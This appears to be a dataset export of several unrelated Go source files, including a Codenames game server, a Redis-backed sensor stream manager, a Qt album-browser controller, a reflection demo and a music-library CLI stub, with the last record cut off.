text stringlengths 11 4.05M |
|---|
package main
import (
"fmt"
"io/ioutil"
"log"
"math/rand"
"net/http"
"os"
"path/filepath"
"runtime/trace"
"time"
"github.com/cockroachdb/pebble"
"github.com/jbowens/codenames"
)
const listenAddr = ":9091"
const expiryDur = -24 * time.Hour
func main() {
rand.Seed(time.Now().UnixNano())
// Open a Pebble DB to persist games to disk.
dir := os.Getenv("PEBBLE_DIR")
if dir == "" {
dir = filepath.Join(".", "db")
}
err := os.MkdirAll(dir, os.ModePerm)
if err != nil {
fmt.Fprintf(os.Stderr, "MkdirAll(%q): %s\n", dir, err)
os.Exit(1)
}
log.Printf("[STARTUP] Opening pebble db from directory: %s\n", dir)
db, err := pebble.Open(dir, nil)
if err != nil {
fmt.Fprintf(os.Stderr, "pebble.Open: %s\n", err)
os.Exit(1)
}
defer db.Close()
ps := &codenames.PebbleStore{DB: db}
// Delete any games created too long ago.
err = ps.DeleteExpired(time.Now().Add(expiryDur))
if err != nil {
fmt.Fprintf(os.Stderr, "PebbleStore.DeletedExpired: %s\n", err)
os.Exit(1)
}
go deleteExpiredPeriodically(ps)
// Restore games from disk.
games, err := ps.Restore()
if err != nil {
fmt.Fprintf(os.Stderr, "PebbleStore.Resore: %s\n", err)
os.Exit(1)
}
log.Printf("[STARTUP] Restored %d games from disk.\n", len(games))
if traceDir := os.Getenv("TRACE"); len(traceDir) > 0 {
log.Printf("[STARTUP] Traces enabled; storing most recent trace in %q", traceDir)
go tracePeriodically(traceDir)
}
log.Printf("[STARTUP] Listening on addr %s\n", listenAddr)
server := &codenames.Server{
Server: http.Server{
Addr: listenAddr,
},
Store: ps,
}
if err := server.Start(games); err != nil {
fmt.Fprintf(os.Stderr, "error: %s\n", err)
}
}
func deleteExpiredPeriodically(ps *codenames.PebbleStore) {
for range time.Tick(time.Hour) {
err := ps.DeleteExpired(time.Now().Add(expiryDur))
if err != nil {
log.Printf("PebbleStore.DeletedExpired: %s\n", err)
}
}
}
func tracePeriodically(dst string) {
for range time.Tick(time.Minute) {
takeTrace(dst)
}
}
func takeTrace(dst string) {
f, err := ioutil.TempFile("", "trace")
if err != nil {
log.Printf("[TRACE] error creating temp file: %s", err)
return
}
defer f.Close()
err = trace.Start(f)
if err != nil {
log.Printf("[TRACE] error starting trace: %s", err)
return
}
<-time.After(10 * time.Second)
trace.Stop()
err = os.Rename(f.Name(), dst)
if err != nil {
log.Printf("[TRACE] error renaming trace: %s", err)
}
}
|
package main
// A Card represents a game card and everything that makes it different from other cards.
// To accomodate for other games, new attributes could be added, like an image, an attack/defense value, etc.
type card struct {
Code string `json:"code"`
Value string `json:"value"`
Suit string `json:"suit"`
// CardsetID string `json:"cardset_id"`
}
|
// DRUNKWATER TEMPLATE(add description and prototypes)
// Question Title and Description on leetcode.com
// Function Declaration and Function Prototypes on leetcode.com
//486. Predict the Winner
//Given an array of scores that are non-negative integers. Player 1 picks one of the numbers from either end of the array followed by the player 2 and then player 1 and so on. Each time a player picks a number, that number will not be available for the next player. This continues until all the scores have been chosen. The player with the maximum score wins.
//Given an array of scores, predict whether player 1 is the winner. You can assume each player plays to maximize his score.
//Example 1:
//Input: [1, 5, 2]
//Output: False
//Explanation: Initially, player 1 can choose between 1 and 2.
//If he chooses 2 (or 1), then player 2 can choose from 1 (or 2) and 5. If player 2 chooses 5, then player 1 will be left with 1 (or 2).
//So, final score of player 1 is 1 + 2 = 3, and player 2 is 5.
//Hence, player 1 will never be the winner and you need to return False.
//Example 2:
//Input: [1, 5, 233, 7]
//Output: True
//Explanation: Player 1 first chooses 1. Then player 2 have to choose between 5 and 7. No matter which number player 2 choose, player 1 can choose 233.
//Finally, player 1 has more score (234) than player 2 (12), so you need to return True representing player1 can win.
//Note:
//1 <= length of the array <= 20.
//Any scores in the given array are non-negative integers and will not exceed 10,000,000.
//If the scores of both players are equal, then player 1 is still the winner.
//func PredictTheWinner(nums []int) bool {
//}
// Time Is Money |
package cmd
const (
ConfigFlag = "config"
)
|
package controllercontext
import "github.com/aws/aws-sdk-go/service/ec2"
type ContextStatus struct {
ControlPlane ContextStatusControlPlane
TenantCluster ContextStatusTenantCluster
}
type ContextStatusControlPlane struct {
AWSAccountID string
NATGateway ContextStatusControlPlaneNATGateway
RouteTable ContextStatusControlPlaneRouteTable
PeerRole ContextStatusControlPlanePeerRole
VPC ContextStatusControlPlaneVPC
}
type ContextStatusControlPlaneNATGateway struct {
Addresses []*ec2.Address
}
type ContextStatusControlPlaneRouteTable struct {
// Mappings are key value pairs of control plane route table names and their
// IDs, where the map keys are route table names and the map values are route
// table IDs. The mapping is managed by the routetable resource.
Mappings map[string]string
}
type ContextStatusControlPlanePeerRole struct {
ARN string
}
type ContextStatusControlPlaneVPC struct {
CIDR string
}
type ContextStatusTenantCluster struct {
AWSAccountID string
Encryption ContextStatusTenantClusterEncryption
HostedZoneNameServers string
MasterInstance ContextStatusTenantClusterMasterInstance
TCCP ContextStatusTenantClusterTCCP
VersionBundleVersion string
WorkerInstance ContextStatusTenantClusterWorkerInstance
}
type ContextStatusTenantClusterEncryption struct {
Key string
}
type ContextStatusTenantClusterMasterInstance struct {
DockerVolumeResourceName string
Image string
ResourceName string
Type string
CloudConfigVersion string
}
type ContextStatusTenantClusterTCCP struct {
ASG ContextStatusTenantClusterTCCPASG
IsTransitioning bool
RouteTables []*ec2.RouteTable
Subnets []*ec2.Subnet
VPC ContextStatusTenantClusterTCCPVPC
}
type ContextStatusTenantClusterTCCPVPC struct {
ID string
PeeringConnectionID string
}
type ContextStatusTenantClusterWorkerInstance struct {
DockerVolumeSizeGB string
CloudConfigVersion string
Image string
Type string
}
|
package basic
import (
"fmt"
"reflect"
)
type User struct {
id int
name string
}
func (u User) Memfunc(){
fmt.Println("memfunc")
}
func (u User) MemfuncWitshargs(i int){
fmt.Println("MemfuncWitshargs : ", i)
}
func reflect1(any interface{}){
fmt.Printf("interface{}=%#v \n\n", any)
type1 := reflect.TypeOf(any)
fmt.Printf("reflect.TypeOf(any)=%v \n\n", type1)
value := reflect.ValueOf(any)
fmt.Printf("reflect.ValueOf(any)=%v \n\n", value)
for i := 0; i< type1.NumField(); i++ {
field := type1.Field(i)
value1 := value.Field(i)
/*
if i == 0 {
newValue := value1.Elem()
newValue.SetInt(100)
}
*/
fmt.Printf("for %d, field.Type=%v, field.Name=%v, value1=%v \n", i, field.Type, field.Name, value1)
}
fmt.Println("\n")
for i := 0; i< type1.NumMethod(); i++ {
method := type1.Method(i)
fmt.Printf("method.Type=%v, method.Name=%v \n", method.Type, method.Name)
//fmt.Println(type1.NumIn())
if i == 0 {
// 无参数反射方法的调用
methodValue := value.MethodByName(method.Name)
args := make([]reflect.Value, 0)
/*
不管反射的方法有没有参数, 用call调用, 必须有个切片作为参数
*/
methodValue.Call(args)
}else if i == 1 {
methodValue := value.MethodByName(method.Name)
args := []reflect.Value{reflect.ValueOf(50)}
methodValue.Call(args)
}
}
}
func Testreflect(){
user := User{1, "abc"}
fmt.Printf("user: %#v \n", user)
reflect1(user)
fmt.Printf("after reflect1 user: %#v \n", user)
}
func Reflect(){
fmt.Println("<------------------------------Reflect begin ------------->")
Testreflect()
fmt.Println("\n<------------------------------Reflect end ------------->")
} |
// Copyright 2019 Radiation Detection and Imaging (RDI), LLC
// Use of this source code is governed by the BSD 3-clause
// license that can be found in the LICENSE file.
package live
import (
"context"
"fmt"
"log"
"net/url"
"strconv"
"strings"
"time"
"github.com/rditech/rdi-live/data"
"github.com/rditech/rdi-live/live/message"
"github.com/rditech/rdi-live/live/shows"
"github.com/rditech/rdi-live/model/rdi/slowdata"
"github.com/go-redis/redis"
"github.com/golang/protobuf/proto"
"github.com/google/uuid"
"github.com/proio-org/go-proio"
)
type ShowInfo struct {
Show interface{}
Cancel context.CancelFunc
SampleChannel chan<- interface{}
}
type ShowType int
const (
Projection ShowType = iota
RollXY
XY
Hist2D
)
type SourceType int
const (
Normal SourceType = iota
Advanced
)
type SourceInfo struct {
Name string
ShowIds []uuid.UUID
CompatShows []ShowType
Type SourceType
}
type StreamManager struct {
Namespace string
Name string
Redis *redis.Client
Addr string
InitShows func(*StreamManager)
GenerateSources func(*StreamManager, *proio.Event)
CleanupRunData []data.EventProcessor
Metadata map[string]string
ctx context.Context
showInfo map[uuid.UUID]ShowInfo
sourceInfo map[string]*SourceInfo
runChannel chan *proio.Event
runFilename string
doPubDesc bool
lastTempMeta, lastHvMeta []byte
startTime time.Time
}
func (m *StreamManager) Manage(input <-chan *proio.Event, output chan<- *proio.Event) {
var cancel context.CancelFunc
m.ctx, cancel = context.WithCancel(context.Background())
defer cancel()
defer m.rmAllShows(&message.Cmd{})
if m.sourceInfo == nil {
m.sourceInfo = make(map[string]*SourceInfo)
}
if m.showInfo == nil {
m.showInfo = make(map[uuid.UUID]ShowInfo)
}
if m.InitShows != nil {
m.InitShows(m)
}
cmds := message.ReceivePubSubCmds(m.ctx, m.Addr, m.Namespace+" stream cmd "+m.Name)
m.announce()
defer m.closeStream()
m.startTime = time.Now()
for {
select {
case event := <-input:
if event == nil {
return
}
m.handleMetadata(event)
m.GenerateSources(m, event)
if m.runChannel != nil {
select {
case m.runChannel <- event:
default:
}
}
output <- event
case cmd := <-cmds:
if cmd.Command == "kill" {
return
}
m.execute(cmd)
}
}
}
func (m *StreamManager) GetSourceInfo(source string) *SourceInfo {
sourceInfo := m.sourceInfo[source]
if sourceInfo == nil {
sourceInfo = &SourceInfo{Name: source}
m.sourceInfo[source] = sourceInfo
}
return sourceInfo
}
func (m *StreamManager) HandleSource(sourceInfo *SourceInfo, t SourceType, value ...interface{}) {
if len(value) == 0 || sourceInfo == nil {
return
}
if sourceInfo.Type != t {
sourceInfo.Type = t
}
if len(value) == 3 {
val0f, ok0f := value[0].(*float32)
val1f, ok1f := value[1].(*float32)
val2f, ok2f := value[2].(*float32)
if ok0f && ok1f && ok2f {
if sourceInfo.CompatShows == nil {
sourceInfo.CompatShows = []ShowType{Hist2D}
m.listSource(sourceInfo.Name, sourceInfo)
}
for _, showId := range sourceInfo.ShowIds {
showInfo := m.showInfo[showId]
show := showInfo.Show
switch show.(type) {
case *shows.Hist2D:
showInfo.SampleChannel <- &shows.Hist2DSample{
float64(*val0f),
float64(*val1f),
float64(*val2f),
}
}
}
}
} else if len(value) == 2 {
val0d, ok0d := value[0].(*float64)
val0f, ok0f := value[0].(*float32)
val1f, ok1f := value[1].(*float32)
if ok0d && ok1f {
if sourceInfo.CompatShows == nil {
sourceInfo.CompatShows = []ShowType{RollXY}
m.listSource(sourceInfo.Name, sourceInfo)
}
for _, showId := range sourceInfo.ShowIds {
showInfo := m.showInfo[showId]
show := showInfo.Show
switch show.(type) {
case *shows.RollXY:
showInfo.SampleChannel <- &shows.RollXYSample{
*val0d,
float64(*val1f),
sourceInfo.Name,
}
}
}
} else if ok0f && ok1f {
if sourceInfo.CompatShows == nil {
sourceInfo.CompatShows = []ShowType{XY}
m.listSource(sourceInfo.Name, sourceInfo)
}
for _, showId := range sourceInfo.ShowIds {
showInfo := m.showInfo[showId]
show := showInfo.Show
switch show.(type) {
case *shows.XY:
showInfo.SampleChannel <- &shows.XYSample{
float64(*val0f),
float64(*val1f),
sourceInfo.Name,
}
}
}
}
}
valArray, okArray := value[0].([]float32)
if okArray {
if sourceInfo.CompatShows == nil {
sourceInfo.CompatShows = []ShowType{Projection}
m.listSource(sourceInfo.Name, sourceInfo)
}
for _, showId := range sourceInfo.ShowIds {
showInfo := m.showInfo[showId]
show := showInfo.Show
switch show.(type) {
case *shows.Projection:
showInfo.SampleChannel <- &shows.ProjectionSample{
valArray,
sourceInfo.Name,
}
}
}
}
}
func (m *StreamManager) announce() {
msg := &message.Msg{
Metadata: make(map[string]string),
}
msg.Type = "stream announce"
msg.Metadata["name"] = m.Name
if err := message.PublishJsonMsg(m.Redis, m.Namespace+" broadcast", msg); err != nil {
log.Println(err)
}
}
func (m *StreamManager) closeStream() {
msg := &message.Msg{
Metadata: make(map[string]string),
}
msg.Type = "stream close"
msg.Metadata["name"] = m.Name
if err := message.PublishJsonMsg(m.Redis, m.Namespace+" broadcast", msg); err != nil {
log.Println(err)
}
}
func (m *StreamManager) execute(cmd *message.Cmd) {
log.Println("StreamManager:", string(cmd.Command))
switch cmd.Command {
case "new show":
m.newShow(cmd)
case "map source":
m.mapSource(cmd)
case "rm show":
m.rmShow(cmd)
case "rm all shows":
m.rmAllShows(cmd)
case "show cmd":
m.showCmd(cmd)
case "pub all shows":
m.pubAllShows(cmd)
case "list all sources":
m.listAllSources(cmd)
case "start run":
m.startRun(cmd)
case "stop run":
m.stopRun(cmd)
case "pub run meta":
m.pubRunMeta(cmd)
case "pub desc":
m.pubDesc(cmd)
}
}
func (m *StreamManager) newShow(cmd *message.Cmd) {
var show shows.Show
var period time.Duration
if v, ok := cmd.Metadata["period"]; ok {
ns, err := strconv.Atoi(v)
if err == nil {
period = time.Duration(ns)
}
}
if period == 0 {
period = 50 * time.Millisecond
} else if period < 10*time.Millisecond {
period = 10 * time.Millisecond
}
switch cmd.Metadata["type"] {
case "Histogram 2D":
plot := &shows.Hist2D{FramePeriod: period}
plot.InitPlot()
show = plot
case "XY":
plot := &shows.XY{FramePeriod: period}
plot.InitPlot()
show = plot
case "Roll XY":
plot := &shows.RollXY{FramePeriod: period}
plot.InitPlot()
show = plot
case "Projection":
plot := &shows.Projection{FramePeriod: period}
plot.InitPlot()
show = plot
default:
return
}
ctx, cancel := context.WithCancel(m.ctx)
showId := uuid.New()
idString := showId.String()
channel := make(chan interface{}, 10000)
showInfo := ShowInfo{
Show: show,
Cancel: cancel,
SampleChannel: channel,
}
m.showInfo[showId] = showInfo
go func() {
log.Println("starting show", idString, "frame pusher")
defer log.Println("stopped show", idString, "frame pusher")
defer func() {
msg := &message.Msg{
Type: "show close",
Metadata: make(map[string]string),
}
msg.Metadata["stream"] = m.Name
msg.Metadata["show id"] = idString
message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
}()
show.UpdateFrame()
var lastFrameCount uint64
for {
select {
case <-ctx.Done():
return
default:
}
frame, frameCount := show.Frame()
if frameCount != lastFrameCount {
frame.Type = "show frame"
frame.Metadata["show id"] = idString
frame.Metadata["stream name"] = m.Name
if err := message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, frame); err != nil {
log.Println(err)
}
time.Sleep(period)
} else {
time.Sleep(1 * time.Millisecond)
}
lastFrameCount = frameCount
}
}()
go func() {
log.Println("starting show", idString, "sample getter")
defer log.Println("stopped show", idString, "sample getter")
defer close(channel)
for {
select {
case <-ctx.Done():
return
case sample := <-channel:
show.AddSample(sample)
}
}
}()
cmd.Metadata["show id"] = idString
m.mapSource(cmd)
cmd.Metadata["show cmd"] = "set params"
m.showCmd(cmd)
}
func (m *StreamManager) mapSource(cmd *message.Cmd) {
source := cmd.Metadata["source"]
if len(source) == 0 {
return
}
if idString, ok := cmd.Metadata["show id"]; ok {
showId, _ := uuid.Parse(idString)
if _, ok := m.showInfo[showId]; !ok {
return
}
for _, source := range strings.Split(source, ",") {
source = strings.TrimSpace(source)
sourceInfo, sourceInfoOk := m.sourceInfo[source]
if !sourceInfoOk {
sourceInfo = &SourceInfo{Name: source}
}
mapped := false
for _, thisId := range sourceInfo.ShowIds {
if thisId == showId {
mapped = true
break
}
}
if !mapped {
sourceInfo.ShowIds = append(sourceInfo.ShowIds, showId)
}
if !sourceInfoOk {
m.sourceInfo[source] = sourceInfo
}
}
}
}
func (m *StreamManager) rmShow(cmd *message.Cmd) {
var showId uuid.UUID
if idString, ok := cmd.Metadata["show id"]; ok {
showId, _ = uuid.Parse(idString)
if info, ok := m.showInfo[showId]; ok {
info.Cancel()
delete(m.showInfo, showId)
}
}
for _, sourceInfo := range m.sourceInfo {
list := sourceInfo.ShowIds
tmp := list[:0]
for i := range list {
if list[i] != showId {
tmp = append(tmp, list[i])
}
}
sourceInfo.ShowIds = tmp
}
}
func (m *StreamManager) rmAllShows(cmd *message.Cmd) {
for _, info := range m.showInfo {
info.Cancel()
}
m.showInfo = make(map[uuid.UUID]ShowInfo)
for _, sourceInfo := range m.sourceInfo {
sourceInfo.ShowIds = nil
}
}
func (m *StreamManager) showCmd(cmd *message.Cmd) {
if idString, ok := cmd.Metadata["show id"]; ok {
showId, _ := uuid.Parse(idString)
cmd.Command = cmd.Metadata["show cmd"]
if info, ok := m.showInfo[showId]; ok {
delete(cmd.Metadata, "show id")
delete(cmd.Metadata, "show cmd")
e := info.Show.(message.Executer)
e.Execute(cmd)
}
}
}
func (m *StreamManager) pubAllShows(cmd *message.Cmd) {
for _, info := range m.showInfo {
framer := info.Show.(shows.Show)
framer.UpdateFrameCount()
}
}
func (m *StreamManager) listAllSources(*message.Cmd) {
for source, sourceInfo := range m.sourceInfo {
m.listSource(source, sourceInfo)
}
}
func (m *StreamManager) listSource(source string, sourceInfo *SourceInfo) {
msg := &message.Msg{
Type: "source announce",
Metadata: make(map[string]string),
}
msg.Metadata["stream"] = m.Name
msg.Metadata["source"] = source
var compatShowList string
for i, showType := range sourceInfo.CompatShows {
switch showType {
case Hist2D:
compatShowList += "Histogram 2D"
case XY:
compatShowList += "XY"
case RollXY:
compatShowList += "Roll XY"
case Projection:
compatShowList += "Projection"
}
if i < len(sourceInfo.CompatShows)-1 {
compatShowList += ", "
}
}
msg.Metadata["compat shows"] = compatShowList
var sourceType string
switch sourceInfo.Type {
case Normal:
sourceType = "Normal"
case Advanced:
sourceType = "Advanced"
}
msg.Metadata["type"] = sourceType
message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
}
var RunDateFormat = "2006_Jan2_15_04_05_UTC"
func (m *StreamManager) startRun(cmd *message.Cmd) {
urlString := cmd.Metadata["url"] + "/" + time.Now().UTC().Format(RunDateFormat) + ".proio"
writer, err := data.GetWriter(m.ctx, urlString, cmd.Metadata["credentials"])
if err != nil {
log.Println(err)
return
}
thisUrl, err := url.Parse(urlString)
m.runFilename = strings.TrimLeft(thisUrl.Path, "/")
if m.runChannel != nil {
m.runChannel <- nil
}
m.runChannel = make(chan *proio.Event, 10000)
log.Printf("starting run %v://%v/%v", thisUrl.Scheme, thisUrl.Host, m.runFilename)
writer.SetCompression(proio.LZ4)
delete(cmd.Metadata, "credentials")
delete(cmd.Metadata, "url")
for key, value := range cmd.Metadata {
writer.PushMetadata(key, []byte(value))
}
msg := &message.Msg{
Type: "stream status",
Metadata: make(map[string]string),
}
msg.Metadata["stream"] = m.Name
msg.Metadata["Run"] = m.runFilename
message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
ctx, cancel := context.WithCancel(m.ctx)
go func() {
defer writer.Close()
go func() {
start := time.Now()
for {
time.Sleep(100 * time.Millisecond)
select {
case <-ctx.Done():
return
default:
}
msg := &message.Msg{
Type: "stream status",
Metadata: make(map[string]string),
}
msg.Metadata["stream"] = m.Name
msg.Metadata["Run Time"] = fmt.Sprintf("%v", time.Since(start).Truncate(100*time.Millisecond))
message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
}
}()
defer cancel()
defer log.Printf("stopping run %v://%v/%v", thisUrl.Scheme, thisUrl.Host, m.runFilename)
for event := range m.runChannel {
if event == nil {
return
}
for key := range cmd.Metadata {
delete(event.Metadata, key)
}
for _, proc := range m.CleanupRunData {
proc(event)
}
writer.Push(event)
}
}()
}
func (m *StreamManager) stopRun(cmd *message.Cmd) {
log.Printf("stopping run")
if m.runChannel != nil {
m.runChannel <- nil
}
m.runChannel = nil
}
func (m *StreamManager) pubRunMeta(cmd *message.Cmd) {
}
func (m *StreamManager) pubDesc(cmd *message.Cmd) {
m.doPubDesc = true
}
func (m *StreamManager) handleMetadata(event *proio.Event) {
if m.doPubDesc {
m.doPubDesc = false
msg := &message.Msg{
Type: "stream status",
Metadata: make(map[string]string),
}
msg.Metadata["stream"] = m.Name
msg.Metadata["Description"] = string(event.Metadata["Description"])
message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
}
tempMeta := event.Metadata["Temp"]
if len(tempMeta) > 0 && (m.lastTempMeta == nil || &tempMeta[0] != &m.lastTempMeta[0]) {
m.lastTempMeta = tempMeta
t := &slowdata.Temp{}
err := proto.Unmarshal(tempMeta, t)
if err == nil {
msg := &message.Msg{
Type: "stream status",
Metadata: make(map[string]string),
}
msg.Metadata["stream"] = m.Name
msg.Metadata["Temp"] = t.String()
message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
}
tStamp := float64(time.Since(m.startTime).Nanoseconds()) / 1e9
for i, val := range t.Som {
temp := m.GetSourceInfo(fmt.Sprintf("SoM %d Temp", i))
m.HandleSource(temp, Advanced, &tStamp, &val)
}
for i, val := range t.Fem {
temp := m.GetSourceInfo(fmt.Sprintf("FEM %d Temp", i))
m.HandleSource(temp, Advanced, &tStamp, &val)
}
for i, val := range t.Board {
temp := m.GetSourceInfo(fmt.Sprintf("Board Temp %d", i))
m.HandleSource(temp, Advanced, &tStamp, &val)
}
}
hvMeta := event.Metadata["HV"]
if len(hvMeta) > 0 && (m.lastHvMeta == nil || &hvMeta[0] != &m.lastHvMeta[0]) {
m.lastHvMeta = hvMeta
t := &slowdata.Hv{}
err := proto.Unmarshal(hvMeta, t)
if err == nil {
msg := &message.Msg{
Type: "stream status",
Metadata: make(map[string]string),
}
msg.Metadata["stream"] = m.Name
msg.Metadata["HV"] = t.String()
message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
}
tStamp := float64(time.Since(m.startTime).Nanoseconds()) / 1e9
for i, val := range t.DacValue {
dacval := m.GetSourceInfo(fmt.Sprintf("DAC %d Value", i))
floatVal := float32(val)
m.HandleSource(dacval, Advanced, &tStamp, &floatVal)
}
}
}
|
package controller
import (
"fmt"
"strconv"
"strings"
"time"
"github.com/therecipe/qt/core"
"github.com/therecipe/qt/widgets"
"github.com/therecipe/qt/xml"
"github.com/therecipe/qt/internal/examples/sql/masterdetail_qml/model"
)
var Instance *Controller
type Controller struct {
core.QObject
albumData *xml.QDomDocument
qApp *widgets.QApplication
_ func() `constructor:"init"`
_ *core.QAbstractItemModel `property:"artistModel"`
_ *core.QAbstractItemModel `property:"albumModel"`
//<-view
_ func() `signal:"aboutQt"`
//<-artist
_ func(row int) `signal:"changeArtist"`
//<-album
_ func(index *core.QModelIndex) `signal:"deleteAlbum"`
_ func(index *core.QModelIndex) `signal:"showAlbumDetails"`
_ func(column int, order core.Qt__SortOrder) `signal:"sortTableView"`
//->detail
_ func() `signal:"showImageLabel"`
_ func(profileLabelText string) `signal:"showArtistProfile"`
_ func(title string, elements []string) `signal:"showTitleAndAlbumDetails"`
//album<->dialog
_ func() `signal:"deleteAlbumCommand"`
_ func() `signal:"deleteAlbumRequest"`
_ func(title, artist string) `signal:"deleteAlbumShowRequest"`
//dialog<->view
_ func() `signal:"addAlbumShowRequest"`
_ func(artist string, title string, year int, tracks string) `signal:"addAlbum"`
}
func (c *Controller) init() {
Instance = c
c.albumData = xml.NewQDomDocument()
c.SetArtistModel(model.NewListModel())
c.SetAlbumModel(model.NewSortFilterModel())
//<-view
c.ConnectAboutQt(func() { c.qApp.AboutQt() })
//<-artist
c.ConnectChangeArtist(c.changeArtist)
//<-album
c.ConnectDeleteAlbum(c.deleteAlbum)
c.ConnectShowAlbumDetails(c.showAlbumDetails)
c.ConnectSortTableView(model.SortFilterModel.Sort)
c.ConnectAddAlbum(c.addAlbum)
go func() {
count := 0
for range time.NewTicker(5 * time.Second).C {
c.AddAlbum("goRoutineArtist", fmt.Sprint(count), 2017, "")
count++
}
}()
}
func (c *Controller) InitWith(file *core.QFile, qApp *widgets.QApplication) {
c.readalbumData(file)
c.qApp = qApp
}
func (c *Controller) changeArtist(row int) {
artist := model.ListModel.Index(row, 0, core.NewQModelIndex()).Data(int(core.Qt__DisplayRole)).ToString()
if row > 0 {
model.SortFilterModel.SetFilterFixedString(artist)
model.SortFilterModel.SetFilterKeyColumn(2)
c.showArtistProfile(artist)
} else if row == 0 {
model.SortFilterModel.SetFilterFixedString("")
c.ShowImageLabel()
}
}
func (c *Controller) showArtistProfile(artist string) {
c.ShowArtistProfile(fmt.Sprintf("Artist : %v \nNumber of Albums: %v", artist, model.GetAlbumCountForArtist(artist)))
}
func (c *Controller) showAlbumDetails(index *core.QModelIndex) {
artist := index.Data(int(core.Qt__UserRole) + 3).ToString()
title := index.Data(int(core.Qt__UserRole) + 2).ToString()
year := index.Data(int(core.Qt__UserRole) + 4).ToString()
albumId := index.Data(int(core.Qt__UserRole) + 1).ToString()
c.showArtistProfile(artist)
var trackList []string
albums := c.albumData.ElementsByTagName("album")
for i := 0; i < albums.Count(); i++ {
album := albums.Item(i)
if album.ToElement().Attribute("id", "") == albumId {
trackList = c.getTrackList(album.ToElement())
break
}
}
c.ShowTitleAndAlbumDetails(fmt.Sprintf("Title: %v (%v)", title, year), trackList)
}
func (c *Controller) readalbumData(file *core.QFile) {
if !file.Open(core.QIODevice__ReadOnly) {
return
}
if !c.albumData.SetContent3(file, false, "", 0, 0) {
file.Close()
return
}
file.Close()
}
func (c *Controller) getTrackList(album *xml.QDomElement) []string {
var out []string
tracks := album.ChildNodes()
var track *xml.QDomNode
var trackNumber string
for j := 0; j < tracks.Count(); j++ {
track = tracks.Item(j)
trackNumber = track.ToElement().Attribute("number", "")
out = append(out, trackNumber+": "+track.ToElement().Text())
}
return out
}
func (c *Controller) deleteAlbum(index *core.QModelIndex) {
c.removeAlbumFromFile(index.Data(int(core.Qt__UserRole) + 1).ToInt(nil))
c.removeAlbumFromDatabase(index)
}
func (c *Controller) removeAlbumFromFile(id int) {
albums := c.albumData.ElementsByTagName("album")
for i := 0; i < albums.Count(); i++ {
node := albums.Item(i)
if node.ToElement().Attribute("id", "") == strconv.Itoa(id) {
c.albumData.ElementsByTagName("archive").Item(0).RemoveChild(node)
break
}
}
/*
The following code is commented out since the example uses an in
memory database, i.e., altering the XML file will bring the data
out of sync.
if !c.file.Open(core.QIODevice__WriteOnly) {
return
} else {
stream := core.NewQTextStream2(w.file)
c.albumData.ElementsByTagName("archive").Item(0).Save(stream, 4, 0)
c.file.Close()
}
*/
}
func (c *Controller) removeAlbumFromDatabase(index *core.QModelIndex) {
//TODO
//inserting or removing from this model (SortFilterModel) will NOT affect the sourceModel
//(because calls are not going through?) and it will therefore lead to glitches
//resetModel however affectes both models and works ... but it can be slow
//model.SortFilterModel.BeginRemoveRows(core.NewQModelIndex(), index.Row(), index.Row())
model.SortFilterModel.BeginResetModel()
model.DeleteAlbum(index.Data(int(core.Qt__UserRole) + 1).ToInt(nil))
model.SortFilterModel.EndResetModel()
//model.SortFilterModel.EndRemoveRows()
c.ShowImageLabel()
}
func (c *Controller) addAlbum(artist string, title string, year int, tracks string) {
var artistId int
if a := model.GetArtistForName(artist); a != nil {
artistId = a.ID
} else {
artistId = c.addNewArtist(artist)
}
albumId := c.addNewAlbum(title, artistId, year)
c.addTracks(albumId, strings.Split(tracks, ","))
}
func (c *Controller) addNewArtist(name string) int {
artistId := model.GetNextArtistID()
model.ListModel.BeginInsertRows(core.NewQModelIndex(), model.ListModel.RowCount(core.NewQModelIndex())+1, model.ListModel.RowCount(core.NewQModelIndex())+1)
model.CreateNewArtist(artistId, name)
model.ListModel.EndInsertRows()
return artistId
}
func (c *Controller) addNewAlbum(title string, artistId int, year int) int {
albumId := model.GetNextAlbumID()
//TODO
//inserting or removing from this model (SortFilterModel) will NOT affect the sourceModel
//(because calls are not going through?) and it will therefore lead to glitches
//resetModel however affectes both models and works ... but it can be slow
//model.SortFilterModel.BeginInsertRows(core.NewQModelIndex(), d.model.RowCount(core.NewQModelIndex())+1, d.model.RowCount(core.NewQModelIndex())+1)
model.SortFilterModel.BeginResetModel()
model.CreateNewAlbum(artistId, albumId, title, year)
model.SortFilterModel.EndResetModel()
//model.SortFilterModel.EndInsertRows()
return albumId
}
func (c *Controller) addTracks(albumId int, tracks []string) {
albumNode := c.albumData.CreateElement("album")
albumNode.SetAttribute4("id", albumId)
for i := 0; i < len(tracks); i++ {
trackNumber := strconv.Itoa(i)
if i < 10 {
trackNumber = "0" + trackNumber
}
textNode := c.albumData.CreateTextNode(tracks[i])
trackNode := c.albumData.CreateElement("track")
trackNode.SetAttribute("number", trackNumber)
trackNode.AppendChild(textNode)
albumNode.AppendChild(trackNode)
}
archive := c.albumData.ElementsByTagName("archive")
archive.Item(0).AppendChild(albumNode)
/*
The following code is commented out since the example uses an in
memory database, i.e., altering the XML file will bring the data
out of sync.
if !d.outputFile.Open(core.QIODevice__WriteOnly) {
return
} else {
stream := core.NewQTextStream2(d.outputFile)
archive.Item(0).Save(stream, 4, 0)
d.outputFile.Close()
}
*/
}
|
package main
import (
"flag"
"fmt"
"github.com/misalcedo/jukebox/files"
"github.com/misalcedo/jukebox/workers"
)
const command int = 0
type Parameters struct {
SourcePath string
DestinationPath string
}
func main() {
fmt.Println("Welcome to JukeBox a handy command-line tool to manage your music collection.")
sourcePath := *flag.String("source", "/home/miguel/Music", "The filesystem path to use as the source of the music collection.")
destinationPath := *flag.String("destination", "/tmp", "The filesystem path to use as the destination for changes to the music library.")
flag.Parse()
fmt.Println(sourcePath)
fmt.Println(destinationPath)
fmt.Println(flag.Arg(command))
execute(Parameters{SourcePath: sourcePath, DestinationPath: destinationPath})
}
func execute(parameters Parameters) {
workerPool := workers.New(512)
directory := files.New(parameters.SourcePath)
directory.Walk(workerPool)
}
|
package remento
import (
"github.com/fncodr/godbase"
)
type Prod struct {
BasicRec
}
func NewProd(cx *Cx) *Prod {
return new(Prod).Init(cx)
}
func (self *Prod) OnUpsert(cx *Cx) error {
db := cx.Db().(*Db)
